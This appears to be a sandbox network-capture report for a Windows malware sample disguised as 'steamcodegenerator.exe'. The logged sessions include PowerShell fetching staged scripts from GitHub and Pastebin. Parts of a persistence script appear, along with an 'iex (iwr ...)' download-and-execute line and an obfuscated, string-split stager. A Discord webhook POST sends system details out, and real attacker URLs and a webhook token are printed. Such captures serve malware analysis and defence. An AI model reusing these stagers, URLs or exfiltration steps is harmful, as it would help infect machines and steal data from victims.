                                                                                                                        2024-10-15 13:52:15 UTC4070INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49712 | 185.199.111.133 | 443 | 6628 | C:\Users\user\Desktop\steamcodegenerator.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:52:15 UTC | 549 | OUT | GET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135214Z&X-Amz-Expires=300&X-Amz-Signature=25afd796b2e8a581e90ca77d6c3579553f304f13e0def3361890827057d8a907&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1
                                                                                                                        User-Agent: Downloader
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Host: objects.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
2024-10-15 13:52:16 UTC | 654 | IN | HTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 39510
                                                                                                                        x-amz-id-2: 2yQ2hjkaXDvxiRk3rcYUbcQmpz6nFMYhmpjklQvgJQUZ7HPF7GoL4dKnLWTH17X0VLM2Ls+FV8IYEsqOEeoynn+pEgQuH/LQmd2pAS+mRBE=
                                                                                                                        x-amz-request-id: QHWNM55YC6JSNR9P
                                                                                                                        Last-Modified: Sun, 06 Oct 2024 01:36:28 GMT
                                                                                                                        ETag: "ebe145bd87e74b4bca45e87525372f04"
                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                        Content-Disposition: attachment;filename=stm.txt
                                                                                                                        Content-Type: text/plain
                                                                                                                        Server: AmazonS3
                                                                                                                        Fastly-Restarts: 1
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:16 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        Age: 0
                                                                                                                        X-Served-By: cache-dfw-kdal2120085-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 1
                                                                                                                        X-Timer: S1729000336.918007,VS0,VE169
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: e8 c0 65 00 00 c0 65 00 00 30 67 fb 70 e1 b3 31 b0 2e b5 c0 c2 3e c6 7f 45 9e 24 2a b5 b3 fc 69 87 b4 31 b9 cf fd a7 fc 9b 00 00 00 00 59 44 28 d3 e2 80 68 27 40 df f0 62 05 d0 2d 15 53 21 d4 23 68 7a fa 8d 54 32 e8 58 21 3b 59 73 db 4e a8 6d 30 64 79 44 3b 64 39 ac 78 ac b7 08 b3 ff 58 b7 ae 65 c1 1b 53 f6 f7 5f dd f5 44 26 67 2a 27 5a 47 11 fe 7a 9e 07 29 6f 83 4d b7 28 43 da ee 40 b8 03 9a 38 06 be 48 31 95 be c3 d4 88 c3 8c e6 83 eb d1 53 78 5b 0b 5e 55 04 46 cc 4e 65 38 3b 49 43 10 03 ca e1 a2 2d df d0 bc 35 4f 75 61 fc 05 c6 7c 8a 1d 78 37 54 d1 a2 6d 3f 48 2f 7e e9 c2 7e c6 a3 c5 0b 39 5e d5 b0 85 10 e5 b5 ea 0b 98 71 df 75 26 f9 c0 1f c7 0c 55 25 3d 37 1e ca 5d e1 d3 4a cf bc 71 91 49 70 dc 26 7b b0 34 8d b3 5b ec 0f a5 16 dc b1 f5 bd 60 e3 de 65
                                                                                                                        Data Ascii: ee0gp1.>E$*i1YD(h'@b-S!#hzT2X!;YsNm0dyD;d9xXeS_D&g*'ZGz)oM(C@8H1Sx[^UFNe8;IC-5Oua|x7Tm?H/~~9^qu&U%=7]JqIp&{4[`e
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 60 3f 3a 33 42 27 66 1c 25 78 e9 6b 72 b1 87 8e a6 23 a3 99 44 fe 86 2c 3f 6a ab 95 b6 36 cb d6 05 89 ee e6 b7 21 c3 f8 da 6a 53 e8 d2 45 86 51 73 a4 a0 78 17 ce 14 9e 7f 05 d4 2e dc 14 bf 4b 26 66 21 2e 10 08 81 ef 86 96 55 fb bb db e9 db 3a c4 77 74 5e 71 bb 43 b7 67 5e 12 2f 00 69 29 31 df c3 51 9d 93 c4 e0 10 4d b5 91 8d 3d e3 c1 38 63 03 0b 3b dc 50 8a f4 f7 7b 8c 3b 94 83 9c fb f3 fb e7 1a 29 f0 3b 23 c4 76 fe 6e 48 2a 55 73 64 1b 63 c7 0f e1 d8 1d 6a a5 9c 6c 27 cd bb 88 2d b1 aa c0 41 8e 1b eb e5 4f ca b7 08 d5 53 0f b2 38 09 26 4e d1 b0 1f 0a a0 32 76 c4 ab 9a cc fb 5b 10 00 05 13 fb 74 61 8c e9 f0 be 5e 92 75 a1 bb 95 41 23 67 fe 3b c2 29 05 9d 9f 46 f9 f2 c1 99 c0 a4 54 1a 34 8d aa b8 db 31 14 57 92 cf d9 55 ab da 66 f8 fc a2 6c 2f 08 3a 6b d5
                                                                                                                        Data Ascii: `?:3B'f%xkr#D,?j6!jSEQsx.K&f!.U:wt^qCg^/i)1QM=8c;P{;);#vnH*Usdcjl'-AOS8&N2v[ta^uA#g;)FT41WUfl/:k
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 51 36 53 e6 ca 9d b9 7b 3d a3 3c 6f 0f ac e9 73 bf e1 45 30 cf 78 83 01 ba e5 1d d8 b6 12 48 a2 41 5f 72 23 6b dd a6 f6 3a a0 48 f7 24 94 44 8e 62 1e 7a eb ee 28 a0 47 5e 5d bd de 6f 3d 7a db 7e 4f 7b da 2b 47 81 ed 36 77 59 61 c4 b3 30 3c 3c 50 a1 c5 73 ba 16 32 15 56 bd cf a1 57 8d c5 ea 86 6d 14 d9 f7 3e a5 f9 68 2c f6 09 6d 5e f7 b2 e2 7a cc 02 50 51 f9 a0 db 52 06 dd 0d a0 7d 82 92 e7 f6 1b 25 21 0d 91 eb e4 4e fe 09 c6 ef 5e 0d 29 e0 9f f8 7a b4 d8 79 d8 74 75 d2 e8 38 65 0b 4f 22 58 2f c5 5d a7 23 35 52 89 76 ff e4 d0 d1 62 fc 29 41 2b 47 a1 33 2b 14 26 97 63 7a 5a 37 dc 18 f6 1b a4 8a 05 0f ab fb 51 ac b7 36 83 f1 da e9 57 d1 95 78 ca 20 a8 e1 75 61 67 17 3f e3 00 8d 05 5f 58 aa 0d bd c7 13 e4 8e 96 29 e7 ac c7 48 66 30 b3 de 6f 2e 98 67 65 48 d1
                                                                                                                        Data Ascii: Q6S{=<osE0xHA_r#k:H$Dbz(G^]o=z~O{+G6wYa0<<Ps2VWm>h,m^zPQR}%!N^)zytu8eO"X/]#5Rvb)A+G3+&czZ7Q6Wx uag?_X)Hf0o.geH
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 72 c8 89 86 8a ec 93 d4 5b 5b 14 b2 7c ba 8c 56 98 64 eb 7b ea 6e 8d bc e6 6d 7a 53 b4 b7 ce 60 28 87 94 8f c4 55 5b 51 e7 d3 27 14 d4 47 c3 6b cd 49 37 ef 06 21 b7 a3 0b ea 94 d6 81 e8 7a b2 ae ff 36 6c 73 d2 f2 db 78 d1 d1 3a 0a 77 93 59 4b 6f fd 8c e4 51 69 9c 17 bc 5a 6b b1 0a a9 38 d7 c6 33 d2 d1 66 22 05 7a 3d 28 d0 c0 5e 5d cc 50 3d 8d a5 6a 55 8e 9b 9c 94 9c 5e 4e 3c 43 80 07 f5 4a 1a 11 b6 c1 ac b0 e2 3e 7d 83 61 18 bd b7 79 77 8c 40 78 48 b9 d7 47 61 f4 02 03 7c 48 c3 d0 d3 d0 0a 18 8d e7 17 09 7a 36 50 25 3b 20 e1 45 bd 30 15 d4 0b 58 fc 31 67 ff 5e bc dc 7f 47 60 0a 24 40 d6 4c 5d c7 1c 8e 4f 9c 60 4c a3 3f 52 c6 5d b1 e5 ef a3 f5 06 27 86 f9 dc 10 cb 12 9a 77 2d 2d 06 db 15 30 46 9f db 14 b9 3b 7b 3a 02 7e 04 51 79 c2 d3 41 07 53 2f d1 38 34
                                                                                                                        Data Ascii: r[[|Vd{nmzS`(U[Q'GkI7!z6lsx:wYKoQiZk83f"z=(^]P=jU^N<CJ>}ayw@xHGa|Hz6P%; E0X1g^G`$@L]O`L?R]'w--0F;{:~QyAS/84
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: bd 5f 2c ec 9a 58 4d 1f 05 1b 47 94 32 a5 2c 4e fc e2 3c 4a 8d cc f9 63 63 d3 80 64 5e 0f a1 aa f8 ab 1c b2 53 02 11 a3 60 9a ba 3f 7f 53 2f 18 de 69 0d f5 f4 04 2c 9f 55 03 67 1a a1 b4 a1 2a 12 a8 29 c5 e0 50 ac de bb 0e f3 a6 cb 06 a2 bf 31 bb 24 2e 72 6f 4f 35 05 07 e7 b5 ec 6f 7f be 0c 80 26 80 3f db 41 0d 4e 64 6e 8f e8 bd fc 99 a7 28 b9 8c e9 8e ac 22 8e ee 5c 23 28 af 1d 7a 58 25 fb f3 70 99 cb 45 4e cf 56 3b 16 5b 86 cc be 5d 44 57 2c 6b 78 78 6b 07 1a 05 18 9c 6f 63 4f 53 26 5d 12 bc b3 41 ac 74 fb e3 a5 00 94 eb ef 70 ed 76 d8 9a 07 af d1 c1 28 1e 81 42 0b 90 7c 05 ec 3f b0 0d d9 66 53 16 df dd 22 0a 15 0f 37 57 63 f6 a1 38 56 c6 79 84 d0 59 09 7d 96 48 66 05 b0 f6 13 f6 68 da 19 63 70 68 79 a9 30 c0 a8 b0 8e 8a 57 c2 ae a0 86 c3 39 53 60 34 de
                                                                                                                        Data Ascii: _,XMG2,N<Jccd^S`?S/i,Ug*)P1$.roO5o&?ANdn("\#(zX%pENV;[]DW,kxxkocOS&]Atpv(B|?fS"7Wc8VyY}Hfhcphy0W9S`4
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 15 c7 3a af 21 d7 01 99 91 92 8b ff ca dd 8b 42 c3 61 4e 62 52 3f e1 8b c7 b4 6d 43 a0 b6 44 e7 0a 25 51 01 49 ae 78 a3 b1 09 ae b9 39 71 cd f1 44 99 95 fd 76 b0 57 56 fc 10 01 18 c9 fe 77 06 38 d7 2e 07 82 19 ff 0e c3 d8 24 14 14 48 2d 21 7a cb 62 1e 2e 8b 66 92 bf dd cd 05 0c f8 ef 4f 1c 2e 2d bc 2f 45 0d 40 c2 2c db 8e 5a de c8 64 af cc cd 65 b0 e6 60 9f a5 d6 57 f3 30 88 be a0 e4 36 d6 1a e1 0a b3 cf 9f 6e 20 56 a7 cd c9 a7 49 96 b3 b2 59 ad 89 0b e2 88 94 a2 20 f5 79 ab 91 b3 cb e1 d3 88 60 54 eb 07 cf 15 3d 22 5d 38 27 3e 21 ac 15 a9 de aa 93 db 13 66 ed 54 c3 4c 01 31 6d ea 13 a2 e4 29 9b 3e db 98 c1 1c 12 0a 9f fc 97 77 3b 65 0d 3e fa 3e e6 ea e7 de 31 68 82 be 76 ee 01 e2 03 fd 9c 3f dd 2f 9f e8 f0 cd 20 b7 1b 82 ea 89 f5 d6 28 c2 77 ed 7b ad b0
                                                                                                                        Data Ascii: :!BaNbR?mCD%QIx9qDvWVw8.$H-!zb.fO.-/E@,Zde`W06n VIY y`T="]8'>!fTL1m)>w;e>>1hv?/ (w{
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: c0 4c 38 b7 2d 54 80 8f ad 07 ce 6c d7 6d 37 90 d0 2a 77 ab e0 c9 10 9e 68 6e ae 90 f1 6d d4 3a e3 2b 21 9c 6c 18 55 55 38 b8 13 eb 2e fd 17 e4 89 8e c3 93 61 19 cf 2e 1a 40 26 fa 95 f1 92 67 66 c7 94 9a 50 1f dc e9 68 1f d1 c9 54 78 32 53 48 b8 f0 da 9a b9 09 0c 0a 7f 51 71 5b 03 f1 e3 9c a0 28 96 58 00 b5 04 fb c4 cf db 3d aa 55 77 6d b8 b2 39 e0 61 b4 f2 e7 23 6d b1 a8 39 e0 92 3f 7f 2e 00 fc a0 34 46 80 d4 c5 0e 6a fe 5d 24 b2 5b 01 77 65 2d 59 bf 8b fe c3 e3 8e 45 5f da fa 65 98 0e 53 e8 32 d4 bd e8 5d 35 8a d0 ab 07 31 8d c8 3d 48 17 7a 53 d5 c4 4a a0 36 65 32 9b 8e 49 e2 c2 6f 21 65 dd 8d d3 1f 99 7f ef bc ff c1 8f 70 f2 08 bd f8 4e e7 72 48 a7 4f 86 b4 e1 37 d6 45 3a 26 84 da bc 21 b7 63 e7 38 56 65 f6 35 14 31 91 96 58 6c 5d 3d 6e 19 36 19 37 8c
                                                                                                                        Data Ascii: L8-Tlm7*whnm:+!lUU8.a.@&gfPhTx2SHQq[(X=Uwm9a#m9?.4Fj]$[we-YE_eS2]51=HzSJ6e2Io!epNrHO7E:&!c8Ve51Xl]=n67
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: fd 2e 14 48 4e 91 85 d6 25 b1 8b 6c ff ae a7 19 bf 8f 24 f3 7c 6f 87 56 ef 14 22 67 64 d9 c1 69 3d 66 4c bb 88 30 68 60 61 d9 c5 97 d4 0f cd f2 81 05 32 75 00 0d ae 83 4c b4 71 33 6a 26 b3 ff 00 6e 17 c3 f9 e6 5c f5 55 a1 3a 79 e6 8f 27 98 61 31 ef 53 62 7d a1 3c b7 8b f5 d3 f2 c4 2a d9 f1 31 30 62 08 94 1c 69 db 21 91 51 68 8d 0f 45 32 91 aa bc 8d 2b 22 1c 4b fd 81 ab ef c4 bc 69 5b d2 8f c2 56 08 e2 ad 96 db 16 dd ab a1 99 1f c5 01 fb 67 f7 06 f5 67 2a 50 f1 0a 08 19 69 ac a3 b0 36 9e ff 7b e1 23 9e b9 52 a2 d4 66 95 9b 9d e3 3d a4 ce 9b f6 3f 31 8e 04 87 b3 78 bf e3 06 ac 87 2b d8 93 17 d4 86 dd 0e 4d 7e a3 c3 fe 8e 55 c5 48 74 0e c0 ef 64 40 06 e3 42 e4 ab 55 3d 90 08 5e 05 ca ae 2b 7f d2 75 67 62 a7 ee 07 5c ab be 6e c8 4e be 18 8e a0 05 b0 26 22 ab
                                                                                                                        Data Ascii: .HN%l$|oV"gdi=fL0h`a2uLq3j&n\U:y'a1Sb}<*10bi!QhE2+"Ki[Vgg*Pi6{#Rf=?1x+M~UHtd@BU=^+ugb\nN&"
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 7a ee 7b ce 51 f5 c0 f7 20 80 38 29 33 ea 43 4e d2 2c 47 f9 4c d8 bb 7d 76 2d 47 27 ac e1 b5 fb df 59 5d cd b2 6a c1 fd 17 d0 0e b2 81 95 18 a0 76 dd de c4 7e 5c e7 49 db 31 02 a7 3d 0c ca 91 0e b2 78 da 4c fc 0d 0f 6d b2 4b 83 57 b1 8b 4e 03 bd bb 44 67 06 b4 82 09 79 5b f5 ab 76 51 fc 45 3c 56 14 cc a7 14 97 fb ea 2d 95 ab 9b eb d6 92 a3 37 02 7f c7 71 2f e5 ea ee f2 49 87 63 41 93 51 9e ca e1 6d b6 c4 a9 f8 e1 70 7d 31 ac 3c cc 61 a2 9a 66 29 ce f5 9e 38 7d 0b 2f e5 48 be ce 96 a7 e3 51 9a 42 4b db 79 e5 d1 f7 98 15 99 7b 47 31 92 0b 24 ea 77 d7 0a cd 05 f8 03 37 71 38 c2 d0 65 81 1d 11 49 81 25 6c 53 99 5a f7 77 bc 7e 5a f1 e6 e6 ac 13 65 c9 01 cf b8 71 c3 85 3d 35 ab ab 0c e0 b6 3f e1 51 1f b8 67 66 8e 7c bc b3 cc 6f 4d 7d 78 4a 71 f4 06 7f 36 54 45
                                                                                                                        Data Ascii: z{Q 8)3CN,GL}v-G'Y]jv~\I1=xLmKWNDgy[vQE<V-7q/IcAQmp}1<af)8}/HQBKy{G1$w7q8eI%lSZw~Zeq=5?Qgf|oM}xJq6TE
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 3f b7 f1 1b b6 fc ea 5c 6f 96 b3 25 68 2f a7 c1 81 2b 29 52 2c e3 de b2 bb 1a 6e a8 3f c6 e0 09 6a 99 eb b7 74 b8 86 fc 00 e2 b2 31 09 d6 45 4a d5 72 40 5f 88 92 f5 8f b7 ed 65 a0 b8 a6 34 cf cc 94 71 89 87 a2 cf f2 f5 97 18 e8 cf 7f 7c ee 46 d0 50 54 49 1f 33 d7 5b 70 4d 67 2c 1e 64 65 fc 54 6f 93 2d 16 3a 5d f5 7c 23 4c 6d 6e 34 b7 b0 6c 84 60 8e b2 80 f7 e5 fc a7 2a 36 de 11 01 97 81 86 4d 92 80 90 7e 8f de e6 b0 c7 57 21 17 4f e8 ea 9f 18 45 d6 37 25 43 f0 8d 4e 34 31 d4 e2 57 e4 4a e8 01 e0 08 9b dd 3f 59 c3 60 a1 53 d2 6e f4 9a 62 cb df 7a 01 53 c6 20 b5 30 65 8d 7a 84 25 63 ed 40 9a bd 68 53 3c 70 8a 16 73 5e 2f 0c f5 b7 e6 c4 34 d5 23 b3 c7 27 54 6e c9 71 93 88 ff 03 98 c4 c1 1e b5 97 2b c5 b8 fc 4b 45 06 d2 51 a8 fa 50 4f c7 b9 8c 23 5f 69 f1 82
                                                                                                                        Data Ascii: ?\o%h/+)R,n?jt1EJr@_e4q|FPTI3[pMg,deTo-:]|#Lmn4l`*6M~W!OE7%CN41WJ?Y`SnbzS 0ez%c@hS<ps^/4#'Tnq+KEQPO#_i


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49797 | 185.199.109.133 | 443 | 4372 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:52:36 UTC | 223 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
2024-10-15 13:52:36 UTC | 901 | IN | HTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 7084
                                                                                                                        Cache-Control: max-age=300
                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        ETag: "19c34b01bc0de3420610e902b58491f6f98d61c6733fbdc38504b32046860435"
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-GitHub-Request-Id: 9790:3FFFA2:8979E5:95DF38:670E73A3
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:36 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdfw8210026-DFW
                                                                                                                        X-Cache: MISS
                                                                                                                        X-Cache-Hits: 0
                                                                                                                        X-Timer: S1729000356.266957,VS0,VE104
                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Fastly-Request-ID: a6b90c0ebbf1e3bcc45ada7ed25a87c8cc5eae69
                                                                                                                        Expires: Tue, 15 Oct 2024 13:57:36 GMT
                                                                                                                        Source-Age: 0
                                                                                                                        2024-10-15 13:52:36 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                                                                                                        Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                                                                                                        2024-10-15 13:52:36 UTC1378INData Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                                                                                                        Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
2024-10-15 13:52:36 UTC | 194 | IN | Data Ascii:
"Failed to send message. Error: $_"
}
#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'

}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49898 | 162.159.138.232 | 443 | 4372 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:52:55 UTC | 311 | OUT | POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 216
Connection: Keep-Alive
2024-10-15 13:52:55 UTC | 216 | OUT | Data Ascii:
{
    "content":  "**user** has joined - stm\n----------------------------------\n**GPU:** L38XPSFZ\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"
}
2024-10-15 13:52:55 UTC | 1354 | IN | HTTP/1.1 204 No Content
Date: Tue, 15 Oct 2024 13:52:55 GMT
Content-Type: text/html; charset=utf-8
Connection: close
set-cookie: __dcfduid=c76c07ce8afc11efb35a8ee061dd2aca; Expires=Sun, 14-Oct-2029 13:52:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1729000376
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drFodlYM8GIn2yzM7wQgGiq4SsT04OF9gHv3FeS5Jei02frL1lReboANpQBI9CdIfpWxB%2BNfxIBo3BaPhZ0AnQIU5%2B6sESkQPoskKl11niMeeDRuowWqqw4pq%2Fc3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c76c07ce8afc11efb35a8ee061dd2aca42fe908a74206032a1d9b4ca47ffd428460ccae185b0d35fd48f05a6a78e1971; Expires=Sun, 14-Oct-2029 13:52:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=8e8f5f93f4ed222c58b1aae65fe99ba14cc762fb-1729000375; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-15 13:52:55 UTC | 211 | IN | Data Ascii:
Set-Cookie: _cfuvid=KCYvurQkC1TyxBEmJm4cKHi97xB47KB0TaCwBqDw6vg-1729000375434-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d304ad91db7466b-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49900 | 172.67.19.24 | 443 | 420 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:52:55 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 13:52:55 UTC | 396 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 13:52:55 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 25
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d304adbcc966c62-DFW
2024-10-15 13:52:55 UTC | 139 | IN | Data Ascii:
85
calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 13:52:55 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49911 | 185.199.109.133 | 443 | 420 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:52:57 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 13:52:57 UTC | 901 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 7508
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
Strict-Transport-Security: max-age=31536000
